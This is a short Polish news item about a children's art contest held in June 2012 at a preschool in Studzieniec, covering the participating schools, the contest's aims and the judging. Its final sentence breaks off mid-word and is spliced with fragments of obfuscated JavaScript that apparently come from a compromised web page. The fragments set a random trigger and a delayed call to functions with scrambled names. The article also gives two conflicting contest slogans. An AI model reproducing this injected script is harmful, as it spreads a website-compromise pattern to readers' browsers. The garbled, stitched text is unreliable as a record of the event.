I Gminny konkurs plastyczny

W dniu 5 czerwca 2012 roku odbył się I Gminny Konkurs Plastyczny pod hasłem „Świat wokół nas” zorganizowany przez Publiczne Przedszkole w Studzieńcu.

Tegoroczne hasło konkursu brzmiało „Moja ulubiona bajka”. Udział w konkursie wzięły dzieci z trzech placówek tj.: Szkoły Podstawowej w Sudragach, Szkoły Podstawowej w Borkowie Kościelnym i gospodarze, dzieci z Publicznego Przedszkola w Studzieńcu.

Celem konkursu było inspirowanie zainteresowań plastycznych oraz promowanie uczniów uzdolnionych, kształtowanie postawy twórczej wobec siebie i świata oraz integrowanie dzieci z różnych placówek. Technika prac była dowolna, a w skład jury wchodzili wszyscy opiekunowie dzieci.

Uczestnicy mieli godzinę czasu na wykonanie swoich prac. Wszyscy bardzo się zaangażowali i wykazali dużą pomysłowością, kreatywnością i znajomością bajek. Jury miało ogromny kłopot wybierając najlepsze prace, gdyż wszystkie były bardzo ładne, ciekawe i estetyczne. Po burzliwych naradach zdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}decy<